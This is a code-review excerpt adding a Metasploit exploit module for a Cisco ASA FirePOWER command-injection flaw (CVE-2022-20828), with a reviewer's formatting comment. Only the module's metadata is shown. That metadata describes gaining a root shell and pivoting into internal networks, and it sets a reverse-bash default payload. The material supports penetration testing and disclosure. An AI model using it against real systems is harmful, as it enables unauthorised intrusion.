modules/exploits/linux/http/cisco_asax_sfr_rce.rb

```diff
@@ -0,0 +1,149 @@
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerability affecting
+          Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
+          ASDM web server and lands in the FirePower Services SFR module's Linux virtual
+          machine as the root user. Access to the virtual machine allows the attacker to
+          pivot to the inside network, and access the outside network. Also, the SFR
+          virtual machine is running snort on the traffic flowing through the ASA, so
+          the attacker should have access to this diverted traffic as well.
+
+          This module requires ASDM credentials in order to traverse the ASDM interface.
+          A similar attack can be performed via Cisco CLI (over SSH), although that isn't
+          implemented here.
+
+          Finally, it's worth noting that this attack bypasses the affects of the
+          `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
+          available but this attack makes it available).
+
+          Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
+          support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
+          and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
+          versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
+          receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2022-20828' ],
+          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ],
+          [ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html']
+        ],
+        'DisclosureDate' => '2022-06-22',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64,],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Shell Dropper',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
```

Comment:
Just for consistency in this file.
```suggestion
              'Arch' => ARCH_X64,
```

Reply:
Fixed